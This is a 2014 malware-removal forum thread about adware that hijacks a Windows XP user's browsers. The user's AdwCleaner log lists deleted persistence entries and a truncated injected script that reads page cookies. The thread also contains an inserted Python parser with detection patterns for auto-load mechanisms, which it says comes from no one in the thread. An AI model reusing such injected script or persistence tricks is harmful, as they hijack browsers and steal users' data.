Browser hijacked every few seconds to fake “help” sites


5 replies to this topic

#1 desperatedirector

desperatedirector

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:38 PM

Posted 21 October 2014 - 12:10 PM

Hi,
I am actually having to write this in Word and hope I can paste without a glitch. My browsers are effectively unusable. It was a miracle that I could register on the site—every 5-20ish seconds, my tab is hijacked to some site offering (heh heh) to “help” me fix my problem. This occurs in both Firefox and Chrome.
I am running an elderly XP (2002) SP3, Pentium D CPU 3 Ghz, 2.99 Ghz, 1.99 GB of RAM. A few days ago I came in and found the “run” window open but stupidly did NOT write down what it said. (My best guess is that a cleaning person in my office space discovered I forgot to log out completely . . .?) I had a bad feeling . . . sure enough, I started getting a subtle but persistent pop-up.  I downloaded Sophos Virus Removal and it found nothing.
After a while, the pop-up presented me with a choice about when I wanted to next see their window—I chose the “never” option and for about half a day it behaved, although my computer was greatly slowed down. Went home for the weekend vowing to contact you when I was next in (I have no other tech support option) and today all hell has broken loose.
I’m now going to try to log back in and paste this in as a new topic. Please forgive me if it double posts or something.

Edit: Moved topic from Windows XP to the more appropriate forum.~ Animal



#2 Adam_2013

Adam_2013

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:10:38 PM

Posted 21 October 2014 - 01:46 PM

Hello & Welcome,

 

There is a tool here in the downloads section that can probably be beneficial, called AdwCleaner, to help remove unwanted programs.

 

http://www.bleepingcomputer.com/download/adwcleaner/dl/125/


Edited by Adam_2013, 21 October 2014 - 01:47 PM.


#3 Queen-Evie

Queen-Evie

    Official Bleepin' G.R.I.T.S. (and proud of it)


  • Staff Emeritus
  • 16,485 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:My own little corner of the universe (somewhere in Alabama). It's OK, they know me here
  • Local time:10:38 PM

Posted 21 October 2014 - 04:30 PM

Instructions for using AdwCleaner

Please download AdwCleaner and install it.

When AdwCleaner opens you will see an image like the one below.

adwcleaner11_zps48314883.png

Click on Scan to start the scan.

Once the search is complete a list of the pending items will be displayed. If you see any which you do not want removed, remove the check mark next to it.

Click on Clean to remove the selected items. If you have any questions about any items in the list please copy and paste the list in your topic so we can review it.

You will receive a message telling you that all programs will be closed so that the infections can be removed. Click on OK. The computer will be restarted to complete the cleaning process.

When the cleaning process is complete a log of what was removed will be presented. Please copy and paste this log in your topic.

Please run Malwarebytes AntiMalware

Please download Malwarebytes Anti-Malware. After clicking on the link the download will start automatically.

1) Double-click on mbam-setup.exe, then click on Run to install the application, follow the prompts through the installation.

2) Malwarebytes will automatically open. If this is the first time you have run this version of Malwarebytes you will see an image like the one below.

mbam1_zps95cc812c.png

Click on Update Now, after Malwarebytes is updated click on Scan.

If this isn't the first time you have run this version, then you will see an image like the one below. Click on Scan.

mbam1_zps98e7fba9.png

You will be prompted to update Malwarebytes, to do so click on Update Now.

mbam2_zps85f38f0c.png

3) The scan will automatically run now.

malwarerun_zps9abd4ef1.png


4) When the scan is complete the results will be displayed. Click on Quarantine All, then click on Apply Actions.

mbam4_zps23e52ad4.png


5) To complete any actions taken you will be asked if you want to restart your computer; click on Yes.

mbam4_zps490948cc.png

#4 desperatedirector

desperatedirector
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:38 PM

Posted 22 October 2014 - 01:30 PM

THANK YOU!!! :bounce:

Everything is OK now--AdwCleaner stopped the hijacking and Malwarebytes actually found a trojan (and some other registry stuff) on another account on this machine!

 

Here is the AdwCleaner log as requested:

 

# AdwCleaner v4.001 - Report created 22/10/2014 at 13:27:15
# DB v
# Updated 20/10/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Idony Lisle - ROOMP33
# Running from : C:\Documents and Settings\Idony Lisle\My Documents\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\Documents and Settings\All Users\Application Data\2308189059
Folder Deleted : C:\Documents and Settings\Guest\Local Settings\Application Data\PackageAware
[!] Folder Deleted : C:\Documents and Settings\All Users\Application Data\Performance Optimizer
Folder Deleted : C:\Documents and Settings\All Users\Application Data\ddeal4mmeu
Folder Deleted : C:\Documents and Settings\Guest\Application Data\Mozilla\Firefox\Profiles\luqvqqy2.default\Extensions\staged\vlby4c@zh-yoiiy.co.uk
Folder Deleted : C:\Documents and Settings\Idony Lisle\Application Data\Mozilla\Firefox\Profiles\j6nv4uzr.default\Extensions\vlby4c@zh-yoiiy.co.uk
File Deleted : C:\Documents and Settings\Idony Lisle\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
File Deleted : C:\Documents and Settings\Idony Lisle\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Deleted : HKLM\SOFTWARE\Classes\deaal4me.deaal4me
Key Deleted : HKLM\SOFTWARE\Classes\deaal4me.deaal4me.1.2
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{35d80ae}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09854D8E-46B5-057B-5B6E-BFD2A04AD5AB}
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\docume~1\alluse~1\applic~1\perfor~1\perfor~1.dll

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702


-\\ Mozilla Firefox v33.0 (x86 en-US)

[j6nv4uzr.default] - Line Deleted : user_pref("extensions.VWl.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]

-\\ Google Chrome v38.0.2125.101


*************************

AdwCleaner[R0].txt - [3813 octets] - [22/10/2014 13:24:22]
AdwCleaner[S0].txt - [3714 octets] - [22/10/2014 13:27:15]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3774 octets] ##########
 

 

I will be deleting the so-called "guest" account on my machine and changing my admin password as well. Is there anything else I should do?

 

I am so grateful!!
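To read a report like the one above for what matters, here is an added example (not AdwCleaner's code and not from anyone in this thread) that parses the report's section and "Deleted" line format and groups the removed entries by the auto-load mechanism they used. The sample log is a constructed, shortened excerpt of the posted one, and the mechanism labels are this example's own.

```python
import re
from collections import defaultdict

# Constructed excerpt modelled on the AdwCleaner "Clean" report posted above
# (paths shortened; the injected script inside the Firefox pref is elided).
SAMPLE_LOG = r"""
***** [ Files / Folders ] *****
[!] Folder Deleted : C:\Documents and Settings\All Users\Application Data\Performance Optimizer
Folder Deleted : C:\Documents and Settings\Guest\Application Data\Mozilla\Firefox\Profiles\x.default\Extensions\staged\vlby4c@zh-yoiiy.co.uk
***** [ Registry ] *****
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\docume~1\alluse~1\applic~1\perfor~1\perfor~1.dll
***** [ Browsers ] *****
[j6nv4uzr.default] - Line Deleted : user_pref("extensions.VWl.scode", "(function(){...})")
"""

SECTION_RE = re.compile(r"^\*{5} \[ (.+?) \] \*{5}$")
# Optional "[profile] - " prefix, optional "[!] " flag, then "<Kind> Deleted : <target>".
ENTRY_RE = re.compile(r"^(?:\[(?P<profile>[^\]]+)\] - )?(?P<flag>\[!\] )?"
                      r"(?P<action>[A-Za-z]+ Deleted) : (?P<target>.+)$")

# Auto-load locations: code placed here runs again without any user action,
# which is why a cleanup can look complete and the hijack still come back.
PERSISTENCE_PATTERNS = {
    "AppInit_DLLs (DLL loaded into every user32 process)": r"\[AppInit_DLLs\]",
    "Browser Helper Object (loaded by IE and Explorer)": r"\\Browser Helper Objects\\",
    "Chrome extension installed via registry": r"\\Google\\Chrome\\Extensions\\",
    "Firefox extension dir (per profile, per account)": r"\\Firefox\\Profiles\\[^\\]+\\Extensions\\",
    "Firefox pref carrying injected page script": r'^user_pref\("extensions\.[^"]+\.scode"',
}

def parse_adwcleaner_log(text):
    """Return {section: [(action, target, profile, flagged), ...]}."""
    sections, current = defaultdict(list), "Header"
    for line in (raw.strip() for raw in text.splitlines()):
        if m := SECTION_RE.match(line):
            current = m.group(1)
        elif m := ENTRY_RE.match(line):
            sections[current].append((m["action"], m["target"], m["profile"], bool(m["flag"])))
    return dict(sections)

def persistence_findings(text):
    """Map each persistence mechanism to the deleted targets that used it."""
    hits = defaultdict(list)
    for entries in parse_adwcleaner_log(text).values():
        for _action, target, _profile, _flagged in entries:
            for name, pattern in PERSISTENCE_PATTERNS.items():
                if re.search(pattern, target, re.I):
                    hits[name].append(target)
    return dict(hits)
```

Run `persistence_findings(SAMPLE_LOG)` on a full report to see at a glance which removed items were self-relaunching; a Guest-profile extension directory in that list is a reminder that every Windows account's browser profile needs the same check.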



#5 desperatedirector

desperatedirector
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:38 PM

Posted 23 October 2014 - 04:25 PM

Wait--it's already back again. I don't understand it. It really seemed to be gone.

 

I re-ran Malwarebytes and it didn't find it; I tried Spybot (which is what I have on my home computer) and it found a bunch of random things, but didn't kill it either. I had to go home before re-running AdwCleaner.

 

I didn't visit any sites after posting my last reply--just shut down that guest account and went home. But today I noticed the tell-tale lag before my browsers started up. Oddly, it didn't seem to affect Gmail in either Chrome or Firefox, but it hit when I opened new tabs.

 

Can anybody explain why this thing is so elusive? I would try to get hold of the re-formatting disks (difficult) but I'm afraid of just getting mysteriously re-infected.



#6 jimbotoo

jimbotoo

  • Banned
  • 297 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:38 PM

Posted 27 October 2014 - 12:35 AM

> Wait--it's already back again. I don't understand it. It really seemed to be gone.
>
> Can anybody explain why this thing is so elusive? I would try to get hold of the re-formatting disks (difficult) but I'm afraid of just getting mysteriously re-infected.


Welcome to the forum, desperatedirector :hello:

I am not a computer whiz; almost everybody here is better than me at fixing this stuff.

 

But I don't think this advice can hurt: look in your add-ons. I had something like you have happen to me; nothing would remove it, and in the end I found the bug was in add-ons and I deleted it.

All the anti-virus stuff thought I wanted it there. It was called "GROOVERO" or something like that; even Spybot left it alone, but I was not running TeaTimer or paranoid mode.

I also noted it seems easier to get add-ons "IN" than take them off.

 

good luck

 

jimbotoo :bubbles:


Edited by jimbotoo, 27 October 2014 - 12:40 AM.




